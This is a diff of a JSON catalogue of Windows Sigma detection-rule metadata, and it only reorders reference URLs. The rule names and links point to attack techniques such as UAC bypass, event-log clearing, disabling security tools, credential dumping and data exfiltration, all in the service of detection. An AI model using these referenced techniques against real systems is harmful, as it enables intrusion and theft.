@@ -60796,8 +60820,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/raspberry-robin/", "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_parent_explorer.yml" ], "tags": [ @@ -60992,9 +61016,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", "https://lolbas-project.github.io/lolbas/Binaries/Cmstp/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md", + "https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml" ], "tags": [ @@ -61186,8 +61210,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", "https://redcanary.com/blog/intelligence-insights-december-2021", + "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" ], "tags": [ 
@@ -61270,9 +61294,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml" ], "tags": [ @@ -61296,9 +61320,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/hfiref0x/UACME", "https://lolbas-project.github.io/lolbas/Binaries/Wsreset/", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", + "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml" ], "tags": [ 
@@ -61414,8 +61438,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml" ], "tags": [ @@ -62088,11 +62112,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", "https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee", "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" ], "tags": [ 
@@ -62579,8 +62603,8 @@ "refs": [ "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", - "https://twitter.com/nao_sec/status/1530196847679401984", "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://twitter.com/nao_sec/status/1530196847679401984", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" ], "tags": [ @@ -62639,8 +62663,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", "https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool", + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_instalutil.yml" ], "tags": [ @@ -62790,10 +62814,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://twitter.com/splinter_code/status/1483815103279603714", "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://twitter.com/splinter_code/status/1483815103279603714", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" ], "tags": "No established tags" 
@@ -62814,8 +62838,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_new_service_creation.yml" ], "tags": [ @@ -62873,8 +62897,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", + "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" ], "tags": [ @@ -62943,8 +62967,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_7zip.yml" ], "tags": [ 
@@ -63143,8 +63167,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/shantanu561993/SharpChisel", "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/", + "https://github.com/shantanu561993/SharpChisel", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sharp_chisel_usage.yml" ], "tags": [ @@ -63178,8 +63202,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" ], "tags": [ @@ -63204,10 +63228,10 @@ "logsource.product": "windows", "refs": [ "http://blog.sevagas.com/?Hacking-around-HTA-files", + "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356", "https://twitter.com/mattifestation/status/1326228491302563846", "https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997", - "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_mshta_execution.yml" ], "tags": [ 
@@ -63328,8 +63352,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" ], "tags": [ @@ -63429,9 +63453,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" ], "tags": [ @@ -63555,9 +63579,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://twitter.com/jonasLyk/status/1555914501802921984", - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml" ], "tags": [ 
@@ -63590,8 +63614,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Moriarty_Meng/status/984380793383370752", "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OSBinaries/Powershell.yml", + "https://twitter.com/Moriarty_Meng/status/984380793383370752", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_run_powershell_script_from_input_stream.yml" ], "tags": [ @@ -63973,8 +63997,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml" ], "tags": [ @@ -63998,8 +64022,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/secedit", + "https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_secedit.yml" ], "tags": [ 
@@ -64105,9 +64129,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/_st0pp3r_/status/1583914515996897281", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://twitter.com/_st0pp3r_/status/1583914515996897281", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" ], "tags": [ @@ -64173,8 +64197,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", + "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", "https://www.exploit-db.com/exploits/37525", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" ], 
@@ -64331,8 +64355,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", "https://github.com/0xdeadbeefJERKY/PowerSploit/blob/8690399ef70d2cad10213575ac67e8fa90ddf7c3/Persistence/Persistence.psm1", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/powershell/persistence/userland/schtasks.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powersploit_empire_schtasks.yml" ], "tags": [ @@ -64412,10 +64436,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://twitter.com/cglyer/status/1355171195654709249", "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://twitter.com/cglyer/status/1355171195654709249", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_security_product_uninstall.yml" ], "tags": [ 
@@ -64512,9 +64536,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" @@ -64653,9 +64677,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", "https://lolbas-project.github.io/lolbas/Binaries/Psr/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" ], "tags": [ 
@@ -64702,11 +64726,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", - "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", - "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html", + "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_trust_discovery.yml" ], "tags": [ @@ -64790,8 +64814,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_gallium_sha1.yml" ], "tags": [ 
@@ -64877,9 +64901,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", - "https://www.poweradmin.com/paexec/", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://www.poweradmin.com/paexec/", + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" ], "tags": [ @@ -64912,8 +64936,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", "https://twitter.com/1ZRR4H/status/1534259727059787783", + "https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml" ], "tags": [ @@ -64937,9 +64961,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_cmd.yml" ], "tags": [ 
@@ -65073,9 +65097,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", "https://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/", "https://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/", + "https://inquest.net/blog/2018/06/22/a-look-at-formbook-stealer", "https://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_formbook.yml" ], @@ -65109,9 +65133,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", - "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml" ], "tags": [ @@ -65177,9 +65201,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/_st0pp3r_/status/1583914244344799235", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://twitter.com/_st0pp3r_/status/1583914244344799235", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" ], "tags": [ 
@@ -65300,8 +65324,8 @@ "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", - "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", + "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_x509enrollment.yml" ], "tags": "No established tags" @@ -65477,9 +65501,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", "https://attack.mitre.org/software/S0404/", "https://twitter.com/vxunderground/status/1423336151860002816", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_esentutl_params.yml" ], "tags": [ @@ -65521,8 +65545,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/gN3mes1s/status/1222088214581825540", - "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://twitter.com/gN3mes1s/status/1222095371175911424", + "https://twitter.com/gN3mes1s/status/1222095963789111296", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_renamed_dctask64.yml" ], "tags": [ 
@@ -65686,8 +65710,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_reconnaissance.yml" ], "tags": [ @@ -65720,8 +65744,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.echotrail.io/insights/search/ilasm.exe", "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", + "https://www.echotrail.io/insights/search/ilasm.exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml" ], "tags": [ @@ -65901,8 +65925,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", + "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_port_forward.yml" ], "tags": [ 
@@ -65938,10 +65962,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://vms.drweb.fr/virus/?i=24144899", "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", "https://twitter.com/JohnLaTwC/status/1415295021041979392", - "https://vms.drweb.fr/virus/?i=24144899", - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_reg_disable_sec_services.yml" ], "tags": [ @@ -65965,8 +65989,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", + "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_certutil_encode.yml" ], "tags": [ @@ -66166,8 +66190,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", "https://twitter.com/mattifestation/status/986280382042595328", + "https://subt0x11.blogspot.ch/2018/04/wmicexe-whitelisting-bypass-hacking.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bypass_squiblytwo.yml" ], "tags": [ 
@@ -66393,8 +66417,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", "https://twitter.com/pabraeken/status/993298228840992768", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" ], @@ -66482,8 +66506,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml" ], "tags": [ @@ -66583,8 +66607,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", "https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml" ], "tags": [ 
@@ -66617,8 +66641,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/CyberRaiju/status/1273597319322058752", "https://twitter.com/bohops/status/1276357235954909188?s=12", + "https://twitter.com/CyberRaiju/status/1273597319322058752", "https://twitter.com/nas_bench/status/1535322450858233858", "https://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_explorer_break_proctree.yml" @@ -66644,10 +66668,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", - "https://twitter.com/lefterispan/status/1286259016436514816", - "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://twitter.com/jseerden/status/1247985304667066373/photo/1", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", + "https://twitter.com/lefterispan/status/1286259016436514816", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor_susp_usage.yml" ], "tags": [ @@ -66772,8 +66796,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - 